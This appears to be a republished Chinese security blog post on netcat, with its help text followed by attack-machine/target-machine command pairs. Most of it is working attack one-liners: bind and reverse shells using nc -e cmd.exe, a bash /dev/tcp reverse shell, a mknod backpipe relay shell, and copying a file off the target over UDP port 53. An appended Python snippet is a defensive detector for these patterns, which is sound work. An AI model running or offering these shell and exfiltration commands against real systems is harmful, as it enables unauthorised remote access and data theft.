Connect to somewhere: nc [-options] hostname port[s] [ports] ...
Listen for inbound: nc -l -p port [-options] [hostname] [port]
Options
-d                         detach from console, background mode
-c, --close                close connection on EOF from standard input
-e, --exec=PROGRAM         program to exec after connect
-g, --gateway=LIST         source-routing hop point[s], up to 8
-G, --pointer=NUM          source-routing pointer: 4, 8, 12, ...
-h, --help                 show help and exit
-i, --interval=SECS        delay interval for lines sent, ports scanned
-l, --listen               listen mode, for inbound connections
-L, --tunnel=ADDRESS:PORT  forward local port to remote address
-n, --dont-resolve         numeric-only IP addresses, no DNS
-o, --output=FILE          output hexdump of all traffic to FILE (implies -x)
-p, --local-port=NUM       local port number
-r, --randomize            randomize local and remote ports
-s, --source=ADDRESS       local source address (IP or host name)
-t, --tcp                  TCP mode (default)
-T, --telnet               answer using telnet negotiation
-u, --udp                  UDP mode
-v, --verbose              verbose (use twice for more detail)
-V, --version              output version information and exit
-x, --hexdump              hexdump both incoming and outgoing traffic
-w, --wait=SECS            timeout for connects and final net reads
-z, --zero                 zero-I/O mode (for scanning)
Attack machine sets up a listener and waits for the target to deliver CMD
Attack machine: Kali
nc -l -p 3333
Target machine: XP
nc -d <attack machine IP> 3333 -e cmd.exe
Target machine sets up a listener and waits for the attack machine to connect
Target machine:
nc -d -l -p 3333 -e cmd.exe
Attack machine:
nc <target machine IP> 3333
Netcat file transfer (set up the listening side on the attack machine first). UDP port 53 is the DNS port.
Target machine: nc -u 192.168.1.105 53 < 123.txt
Here 192.168.1.105 is the attack machine.
Attack machine:
nc -u -l -p 53 > 456.txt
And
Target machine: nc -v -w 30 -p 3333 -l < 123.txt (-w 30: disconnect after 30 seconds; -l: enter listen mode)
Attack machine: nc -v -w 3 192.168.1.108 3333 > 456.txt (192.168.1.108 is the target)
Linux sets up a connection and delivers a shell to Windows
Attack machine: nc -l -n -vv -p 8080
Target machine: /bin/bash -i > /dev/tcp/192.168.1.108/8080 0<&1 2>&1
mknod backpipe p && telnet 192.168.1.108 8080 0<backpipe | /bin/bash 1>backpipe
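Added example (not part of the original post): a defender-side check that flags the three shell-delivery patterns listed above (netcat run with -e, a shell redirected to /dev/tcp, and the backpipe relay) in recorded command lines, while leaving a plain netcat file transfer alone. The rule names, host names and sample events are constructed for illustration.

```python
import re

# Constructed command lines in the style of shell history or EDR process
# telemetry; hosts and rule names are illustrative, not from the original post.
SAMPLE_EVENTS = [
    ("xp-01", "nc -d 192.168.1.105 3333 -e cmd.exe"),
    ("xp-01", r"C:\tools\nc.exe -d -l -p 3333 -e cmd.exe"),
    ("web-01", "/bin/bash -i > /dev/tcp/192.168.1.108/8080 0<&1 2>&1"),
    ("web-01", "telnet 192.168.1.108 8080 0<backpipe | /bin/bash 1>backpipe"),
    ("ops-01", "nc -v -w 3 192.168.1.108 3333"),   # plain transfer, no -e
    ("ops-01", "bash -c 'echo done > /dev/null'"),  # benign redirection
]

NC_NAMES = {"nc", "ncat", "netcat"}
# -e alone or inside a short-option cluster such as -lvpe, or --exec[=PROGRAM]
EXEC_FLAG = re.compile(r"-[A-Za-z]*e[A-Za-z]*|--exec(=.*)?")
# bash pseudo-device used as a socket: /dev/tcp/<host>/<port>
DEV_TCP = re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+")
# stdin read from a file, piped into a shell whose stdout goes back to the same file
PIPE_RELAY = re.compile(r"0?<\s*(\S+)\s*\|\s*\S*sh\b.*?1?>\s*\1")


def classify(cmdline):
    """Return the names of the rules that one command line matches."""
    hits = []
    tokens = cmdline.split()
    if tokens:
        # Basename of argv[0], tolerant of / and \ separators and a .exe suffix.
        exe = re.sub(r"\.exe$", "", re.split(r"[\\/]", tokens[0])[-1].lower())
        if exe in NC_NAMES and any(EXEC_FLAG.fullmatch(t) for t in tokens[1:]):
            hits.append("netcat-exec")
    if DEV_TCP.search(cmdline):
        hits.append("dev-tcp-redirect")
    if PIPE_RELAY.search(cmdline):
        hits.append("named-pipe-relay")
    return hits


def scan(events):
    """Return (host, cmdline, hits) for every event that matches a rule."""
    return [(h, c, classify(c)) for h, c in events if classify(c)]


if __name__ == "__main__":
    for host, cmdline, hits in scan(SAMPLE_EVENTS):
        print(f"{host}: {','.join(hits)}: {cmdline}")
```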
This article is from the "Cyber Security Enthusiasts" blog; please be sure to keep this source link: http://blackflag.blog.51cto.com/9679269/1641266
The use of Netcat